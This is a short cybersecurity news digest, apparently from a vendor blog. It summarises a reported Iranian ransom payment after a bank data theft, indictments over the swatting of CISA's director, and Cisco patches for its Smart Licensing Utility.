Iran paid at least $3 million in ransom following attack on banking system

POLITICO reports that Iran paid at least $3 million in ransom last month to extortionists who threatened to leak information stolen from up to 20 Iranian banks. The hacking group “IRLeaks” claimed to have stolen personal and financial data belonging to millions of Iranians. Iran hasn’t acknowledged the incident, but the country’s supreme leader said in the wake of the attack that the US and Israel are attempting “to spread psychological warfare to push us into political and economic retreat and achieve its objectives.” POLITICO cites sources as saying that IRLeaks is likely a financially motivated group, unaffiliated with a nation-state. (Politico)


Indictments follow swatting attack on CISA boss Easterly

Following up on the story from last December in which a swatting attack was placed on the home of Jen Easterly, two individuals have now been identified as instigating this attack along with about 100 other threats against U.S. politicians, members of Congress and senior Federal law enforcement officials. The two individuals, both in their 20s, are from Romania and Serbia. (The Record)


Cisco issues patches for smart licensing utility

These patches deal with two issues regarding the company’s Smart Licensing Utility. The first would allow unauthenticated attackers to access sensitive information or to log in as administrators. It exists due to “an undocumented static user credential for an administrative account present in the Utility.” The second issue is due to “excessive verbosity in a debug log file, which could allow an attacker to send a crafted HTTP request and obtain log files containing sensitive data, including credentials.” Since there are no workarounds available, Cisco recommends migrating to Smart License Utility version 2.3.0. (Security Week)


Have questions? Reach out to RedSeal today to chat with one of our cybersecurity experts.